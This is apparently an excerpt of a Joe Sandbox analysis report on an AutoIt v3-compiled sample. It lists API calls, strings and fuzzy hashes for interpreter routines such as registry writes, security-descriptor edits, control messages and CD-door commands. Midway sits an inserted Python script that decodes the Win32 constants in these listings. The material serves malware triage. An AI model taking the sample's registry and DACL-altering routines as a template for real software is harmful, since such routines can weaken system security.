                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006226B8
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006226CC
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 006226EA
                                                                  • GetStockObject.GDI32(00000011), ref: 00622706
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00622711
                                                                    • Part of subcall function 006219CD: GetCursorPos.USER32(?), ref: 006219E1
                                                                    • Part of subcall function 006219CD: ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0062199C), ref: 00622738
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: <)o$<)o$AutoIt v3 GUI$(o$(o$(o
                                                                  • API String ID: 1458621304-1044363296
                                                                  • Opcode ID: 79255fef59ab9de0ffb78995d1e486370d32b103eafb36c60e8c3357e5858058
                                                                  • Instruction ID: d4f5c506fc7ae6b3979573cdbc5abbc43fcdd0cb4191937f5e51f52b02332612
                                                                  • Opcode Fuzzy Hash: 79255fef59ab9de0ffb78995d1e486370d32b103eafb36c60e8c3357e5858058
                                                                  • Instruction Fuzzy Hash: B3B18C71A0021AAFCB14DFA8DC95BEE7BB6FB48314F104219FA15AB390D7749840CF50
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 006B1BC4
                                                                  • GetDesktopWindow.USER32 ref: 006B1BD9
                                                                  • GetWindowRect.USER32(00000000), ref: 006B1BE0
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B1C35
                                                                  • DestroyWindow.USER32(?), ref: 006B1C55
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006B1C89
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B1CA7
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006B1CB9
                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 006B1CCE
                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 006B1CE1
                                                                  • IsWindowVisible.USER32(00000000), ref: 006B1D3D
                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006B1D58
                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006B1D6C
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006B1D84
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 006B1DAA
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 006B1DC4
                                                                  • CopyRect.USER32(?,?), ref: 006B1DDB
                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 006B1E46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: ef20a2d6e5d7e5425643e16a49fbdb558fadb80756e5b1e8cc7fe66225098eeb
                                                                  • Instruction ID: 3f833e6c90099545a14d855aa79d5a573d09d0bf7645d95c81ce874b46e271dd
                                                                  • Opcode Fuzzy Hash: ef20a2d6e5d7e5425643e16a49fbdb558fadb80756e5b1e8cc7fe66225098eeb
                                                                  • Instruction Fuzzy Hash: BDB1BEB1604301AFD714DF64C894B9AFBE6FF85310F408A1CF5999B2A1DB31E885CB96
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006B0D81
                                                                  • _wcslen.LIBCMT ref: 006B0DBB
                                                                  • _wcslen.LIBCMT ref: 006B0E25
                                                                  • _wcslen.LIBCMT ref: 006B0E8D
                                                                  • _wcslen.LIBCMT ref: 006B0F11
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006B0F61
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006B0FA0
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                    • Part of subcall function 00682B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00682BA5
                                                                    • Part of subcall function 00682B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00682BD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 1103490817-719923060
                                                                  • Opcode ID: 70d92775b87d12cb13d4adf608b17abd042d40d7c2576d6642c1a772fd4e1c95
                                                                  • Instruction ID: c6f433d2c201e7cd9e8a2a472a12b476fdfa34a53d0d79a4f137ae2721fa9ddc
                                                                  • Opcode Fuzzy Hash: 70d92775b87d12cb13d4adf608b17abd042d40d7c2576d6642c1a772fd4e1c95
                                                                  • Instruction Fuzzy Hash: E3E1BF712043419FC714DF28C8518AAB7E7FF89354B14496DF8969B3A1DB30ED86CB91
                                                                  APIs
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                    • Part of subcall function 00681A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                    • Part of subcall function 00681A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                    • Part of subcall function 00681A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00681741
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00681775
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0068178C
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 006817C6
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006817E2
                                                                  • GetLengthSid.ADVAPI32(?), ref: 006817F9
                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00681801
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00681808
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00681829
                                                                  • CopySid.ADVAPI32(00000000), ref: 00681830
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0068185F
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00681881
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00681893
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818BA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818C1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818CA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818D1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818DA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818E1
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006818ED
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818F4
                                                                    • Part of subcall function 00681ADF: GetProcessHeap.KERNEL32(00000008,006814FD,?,00000000,?,006814FD,?), ref: 00681AED
                                                                    • Part of subcall function 00681ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,006814FD,?), ref: 00681AF4
                                                                    • Part of subcall function 00681ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006814FD,?), ref: 00681B03
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                  • String ID:
                                                                  • API String ID: 4175595110-0
                                                                  • Opcode ID: efff9b7f7acd1c281fdb25c9e0628eb1e1a968e87cae2227e3db39bc3be3bce7
                                                                  • Instruction ID: 38b159595c83ca7bb58ae7179e547665e3cfa818df050fe0cab264abcdee075f
                                                                  • Opcode Fuzzy Hash: efff9b7f7acd1c281fdb25c9e0628eb1e1a968e87cae2227e3db39bc3be3bce7
                                                                  • Instruction Fuzzy Hash: B1714EF1D00209ABDB10EFA5DC45FEEBBBEAF05310F144225E915AA290E7719946CB61
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006ACF1D
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,006BDCD0,00000000,?,00000000,?,?), ref: 006ACFA4
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 006AD004
                                                                  • _wcslen.LIBCMT ref: 006AD054
                                                                  • _wcslen.LIBCMT ref: 006AD0CF
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006AD112
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 006AD221
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006AD2AD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AD2E1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AD2EE
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006AD3C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 9721498-966354055
                                                                  • Opcode ID: cebe984b7d21a136a2916e6ac20cdd43328e35900ee4ddb3d218ccf9d1d98a62
                                                                  • Instruction ID: 67fec99406edb4f08a41e5aaac986239efd36b5f1acda4e4f527dffeac12a223
                                                                  • Opcode Fuzzy Hash: cebe984b7d21a136a2916e6ac20cdd43328e35900ee4ddb3d218ccf9d1d98a62
                                                                  • Instruction Fuzzy Hash: 681268356046119FCB54EF14C881B6ABBE6EF89714F05885CF98A9B3A2CB31ED41CF85
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006B1462
                                                                  • _wcslen.LIBCMT ref: 006B149D
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B14F0
                                                                  • _wcslen.LIBCMT ref: 006B1526
                                                                  • _wcslen.LIBCMT ref: 006B15A2
                                                                  • _wcslen.LIBCMT ref: 006B161D
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                    • Part of subcall function 00683535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00683547
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 1103490817-4258414348
                                                                  • Opcode ID: c5b30d688b9add6e4f4fc0c3999c8a5142c1de997a3f5c0c282cf4490f64134d
                                                                  • Instruction ID: 2820512072a818e10444bd7f32b06889c7ded216a6b91013d1bee59fea939b68
                                                                  • Opcode Fuzzy Hash: c5b30d688b9add6e4f4fc0c3999c8a5142c1de997a3f5c0c282cf4490f64134d
                                                                  • Instruction Fuzzy Hash: B1E1AEB26047519FC714DF24C4608AAB7E3BF99314F54895CF8969B3A2DB30ED85CB81
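What these "APIs" blocks let an analyst recover, as an added example that is not part of the Joe Sandbox report or of the AutoIt runtime it was generated from: the SendMessageW message numbers and RegSetValueExW type codes in the listings are public Win32 constants, and naming them turns the raw argument columns into the control operations each function performs (LVM_GETSELECTEDCOUNT and LVM_GETITEMSTATE in the DESELECT to VIEWCHANGE block, TVM_GETCOUNT and TVM_GETNEXTITEM in the CHECK to UNCHECK block, REG_SZ, REG_MULTI_SZ, REG_QWORD and REG_BINARY in the REG_* block, TTM_* in the tooltips_class32 block). Together with the command strings, which are the argument names of AutoIt v3's ControlListView, ControlTreeView and RegWrite builtins, this marks the functions as interpreter code rather than the sample's own script logic. The Python below parses bullet lines in the exact format shown on this page; the sample input is copied from the list-view and registry listings above, and the constant tables hold only values that are certain, so any other message is reported numerically.

```python
import re

# Public Win32 constants (winuser.h / commctrl.h / winnt.h). Only values that are
# certain are named; anything else is reported numerically by annotate().
WM_USER, LVM_FIRST, TV_FIRST = 0x0400, 0x1000, 0x1100
MESSAGE_NAMES = {
    0x0080: "WM_SETICON",
    0x00C5: "EM_LIMITTEXT",
    0x00CC: "EM_SETPASSWORDCHAR",
    0x0170: "STM_SETICON",
    WM_USER + 17: "TTM_TRACKACTIVATE",
    WM_USER + 18: "TTM_TRACKPOSITION",
    WM_USER + 24: "TTM_SETMAXTIPWIDTH",
    WM_USER + 29: "TTM_UPDATE",
    WM_USER + 33: "TTM_SETTITLEW",
    WM_USER + 50: "TTM_ADDTOOLW",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 44: "LVM_GETITEMSTATE",
    LVM_FIRST + 50: "LVM_GETSELECTEDCOUNT",
    TV_FIRST + 5: "TVM_GETCOUNT",
    TV_FIRST + 10: "TVM_GETNEXTITEM",
}
REG_TYPE_NAMES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
                  7: "REG_MULTI_SZ", 11: "REG_QWORD"}
# Index of the message argument: SendMessageW(hWnd, Msg, ...), SendDlgItemMessageW(hDlg, id, Msg, ...)
MSG_ARG_INDEX = {"SendMessageW": 1, "PostMessageW": 1, "SendDlgItemMessageW": 2}

# One bullet line of an "APIs" block, with or without the "Part of subcall function" prefix
# and with or without an argument list (e.g. "_wcslen.LIBCMT ref: 006B0DBB").
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def _arg(tok):
    """8 hex digits become an int; '?' (unresolved) and literals such as tooltips_class32 stay strings."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_api_listing(text):
    """Turn the bullet lines of an 'APIs' block into dicts; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref").upper(),
            "args": [] if raw is None else [_arg(a.strip()) for a in raw.split(",")],
            "subcall": m.group("sub"),  # callee address when the line is 'Part of subcall function'
        })
    return calls


def annotate(call):
    """Name the control message or registry value type a call carries, or None if it carries neither."""
    args, api = call["args"], call["api"]
    if api in MSG_ARG_INDEX:
        i = MSG_ARG_INDEX[api]
        if i < len(args) and isinstance(args[i], int):
            return MESSAGE_NAMES.get(args[i], f"msg 0x{args[i]:04X}")
    if api == "RegSetValueExW" and len(args) > 3 and isinstance(args[3], int):
        return REG_TYPE_NAMES.get(args[3], f"type {args[3]}")
    return None


def decode_listing(text):
    """(ref, api, note) for every call that carries a decodable constant, in listing order."""
    out = []
    for call in parse_api_listing(text):
        note = annotate(call)
        if note is not None:
            out.append((call["ref"], call["api"], note))
    return out


# Sample input: lines copied from the list-view and registry-write listings on this page.
SAMPLE_LISTVIEW = """\
• CharUpperBuffW.USER32(?,?), ref: 006B0D81
• _wcslen.LIBCMT ref: 006B0DBB
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006B0F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006B0FA0
  • Part of subcall function 00682B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00682BA5
"""
SAMPLE_REGWRITE = """\
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006AD112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006AD2AD
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006AD3C0
"""

if __name__ == "__main__":
    for ref, api, note in decode_listing(SAMPLE_LISTVIEW) + decode_listing(SAMPLE_REGWRITE):
        print(f"{ref}  {api:<16} {note}")
```

Paste any "APIs" block from the report into a file and feed its text to decode_listing. For SendDlgItemMessageW the message sits in the third argument, which is why the dialog block further down (0xCC EM_SETPASSWORDCHAR, 0xC5 EM_LIMITTEXT) decodes as well; a message missing from the table comes back as "msg 0x...." rather than a guess.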
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharUpper
                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 1256254125-909552448
                                                                  • Opcode ID: 155a316b4ba592b3267d82d23aae7efcb3f1a7d30c30b8532a33e1c3695553c7
                                                                  • Instruction ID: abc1db4192b19dd873c719bb0937883bb5286bbb9de323762576de7d40cd785b
                                                                  • Opcode Fuzzy Hash: 155a316b4ba592b3267d82d23aae7efcb3f1a7d30c30b8532a33e1c3695553c7
                                                                  • Instruction Fuzzy Hash: 25710672A0052A8BCB10BF38C9505FE3393AF66754F250128F86B9B794EA35DD45CB90
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 006B8DB5
                                                                  • _wcslen.LIBCMT ref: 006B8DC9
                                                                  • _wcslen.LIBCMT ref: 006B8DEC
                                                                  • _wcslen.LIBCMT ref: 006B8E0F
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006B8E4D
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006B6691), ref: 006B8EA9
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006B8EE2
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006B8F25
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006B8F5C
                                                                  • FreeLibrary.KERNEL32(?), ref: 006B8F68
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006B8F78
                                                                  • DestroyIcon.USER32(?,?,?,?,?,006B6691), ref: 006B8F87
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006B8FA4
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006B8FB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 799131459-1154884017
                                                                  • Opcode ID: 17bb85b2bf832a9d17bd86fe9b0ab3fb99e14a0387109a2235493dc1e679bd71
                                                                  • Instruction ID: b3681d88c7282ad8b956f469638b7417f0dc3894112ff4866ce2e7fd55d09ef8
                                                                  • Opcode Fuzzy Hash: 17bb85b2bf832a9d17bd86fe9b0ab3fb99e14a0387109a2235493dc1e679bd71
                                                                  • Instruction Fuzzy Hash: 8761D1B1900615BEEB249F64CC42BFE77AEAF08B50F10421AF915DB1D1EF749981CBA0
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0069493D
                                                                  • _wcslen.LIBCMT ref: 00694948
                                                                  • _wcslen.LIBCMT ref: 0069499F
                                                                  • _wcslen.LIBCMT ref: 006949DD
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00694A1B
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694A63
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694A9E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694ACC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1839972693-4113822522
                                                                  • Opcode ID: 3b5bf0bea0de28264d19f00981d89583e0fe0f6bbefcbea386c4cc67e9809dac
                                                                  • Instruction ID: b081ba3b0ec29e91dae73350f718732d8df391b32a4eeebe3bcf17d9b586fadf
                                                                  • Opcode Fuzzy Hash: 3b5bf0bea0de28264d19f00981d89583e0fe0f6bbefcbea386c4cc67e9809dac
                                                                  • Instruction Fuzzy Hash: AA71EE725087118FCB50EF24D8809ABB7EAEF98758F10492DF89697361EB31DD46CB81
                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 00686395
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006863A7
                                                                  • SetWindowTextW.USER32(?,?), ref: 006863BE
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 006863D3
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 006863D9
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 006863E9
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 006863EF
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00686410
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0068642A
                                                                  • GetWindowRect.USER32(?,?), ref: 00686433
                                                                  • _wcslen.LIBCMT ref: 0068649A
                                                                  • SetWindowTextW.USER32(?,?), ref: 006864D6
                                                                  • GetDesktopWindow.USER32 ref: 006864DC
                                                                  • GetWindowRect.USER32(00000000), ref: 006864E3
                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0068653A
                                                                  • GetClientRect.USER32(?,?), ref: 00686547
                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 0068656C
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00686596
                                                                  Memory Dump Source
